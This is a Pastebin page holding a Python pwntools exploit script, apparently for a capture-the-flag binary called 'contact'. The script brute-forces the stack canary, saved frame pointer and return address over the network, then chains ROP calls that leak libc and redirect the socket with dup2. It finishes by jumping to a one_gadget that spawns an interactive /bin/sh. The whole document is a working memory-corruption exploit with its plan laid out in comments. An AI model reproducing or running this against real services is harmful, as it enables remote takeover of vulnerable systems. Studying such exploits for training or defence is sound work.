Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python2
- # -*- coding: utf-8 -*-
- from pwn import *
- from struct import pack
- exe = context.binary = ELF('contact')
- libc = exe.libc
- libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
- host = args.HOST or '127.0.0.1'
- port = int(args.PORT or 1337)
- def remote(argv=[], *a, **kw):
- '''Connect to the process on the remote host'''
- io = connect(host, port)
- return io
- def start(argv=[], *a, **kw):
- '''Start the exploit against the target.'''
- return remote(argv, *a, **kw)
- # Bruteforce an 8-byte rbp register
- def bruteforce(payload):
- ret = ''
- context.log_level = 'error'
- for b in range(8):
- for v in range(256):
- io = start()
- io.recvline()
- dummy = ret + chr(v)
- io.send(payload + dummy)
- try:
- result = io.recvline()
- ret = dummy
- print "bytes: " + hex(u64(ret.ljust(8, '\x00')))
- break
- except:
- continue
- finally:
- io.close()
- context.log_level = 'info'
- return ret
- # Bruteforce an 8-byte canary (technically on 7, because first byte is \x00)
- def bruteforce_canary(payload):
- canary = '\x00'
- context.log_level = 'error'
- for b in range(7):
- for v in range(256):
- io = start()
- io.recvline()
- dummy = canary + chr(v)
- # If the byte is correct Done. will be returned
- io.send(payload + dummy)
- try:
- result = io.recvline()
- canary = dummy
- print "canary: " + hex(u64(canary.ljust(8, '\x00')))
- break
- except:
- continue
- finally:
- io.close()
- context.log_level = 'info'
- return canary
- # Use this one_gadget and not write manual ROP chains
- # 0x4f322 execve("/bin/sh", rsp+0x40, environ)
- # constraints:
- # [rsp+0x40] == NULL
- # -- Exploit goes here --
- # Plan of action:
- # Using fd
- # First fill stack with stuff up to address 0x38
- # Bruteforce the 8-byte canary starting with \x00
- # Bruteforce the 8-byte rbp starting with \x7f (or potentially \x7d or \x7e so bruteforce an extra 2 bits)
- # Bruteforce the 8-byte return address (according to will should begin with a 55 or 56)
- # ROP Chain:
- # Get .text base by subtracting the return address with its offset in the ELF binary
- # leak libc using write@plt(4, write@got, 8)
- # Get libc base by subtracting the offset from write in libc ELF binary
- # Get dup2's address
- # call dup2(0, 4)
- # call dup2(1, 4)
- # call dup2(2, 4)
- # call the one_gadget
- payload = fit({}, length=0x38)
- # Brute force canary
- # canary = bruteforce_canary(payload)
- canary = p64(0x2e51750513e03a00)
- log.info('final canary: ' + hex(u64(canary)))
- payload += canary
- # Brute force rbp
- # rbp = bruteforce(payload)
- rbp = p64(0x7ffd889dae00)
- log.info('final rbp: ' + hex(u64(rbp)))
- payload += rbp
- # Brute force return address
- # ret = bruteforce(payload)
- ret = p64(0x55fdc4aee502)
- log.info('final ret: ' + hex(u64(ret)))
- # Get .text base
- aslr_base = u64(ret) - 0x1502 # ELF is loaded to an address that ends in three 000s
- exe.address = aslr_base
- log.info('ELF begins at ' + hex(exe.address))
- # Leak libc by calling write@plt(4, write@got, 8)
- rop1 = ROP(exe)
- rop1.call(exe.plt.write, [4, exe.got.write, 8])
- log.info('write@plt(4, write@got, 8):\n' + rop1.dump())
- payload += rop1.chain()
- payload += p64(exe.address + 0x159a) # Return back into the vulnerable function to send another payload
- io = start()
- io.recvline()
- io.sendline(payload)
- leak = u64(io.recv(8))
- libc_base = leak - libc.sym.write
- libc.address = libc_base
- log.info('leaked libc base: ' + hex(libc_base))
- payload2 = fit({}, length=0x38) + canary + rbp
- rop4 = ROP([exe, libc])
- rop4.close(libc.sym.close, [0])
- rop4.close(libc.sym.close, [1])
- log.info('close([0,1]):\n' + rop4.dump())
- payload2 += rop4.chain()
- rop2 = ROP([exe, libc])
- rop2.call(libc.sym.dup2, [4, 0])
- rop2.call(libc.sym.dup2, [4, 1])
- log.info('dup2(4, [0, 1]):\n' + rop2.dump())
- payload2 += rop2.chain()
- rop3 = ROP([exe, libc])
- rop3.raw(libc.address + 0x4f2c5)
- log.info('execve("/bin/sh", rsp+0x40, environ):\n' + rop3.dump())
- payload2 += rop3.chain()
- io.sendline(payload2)
- io.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement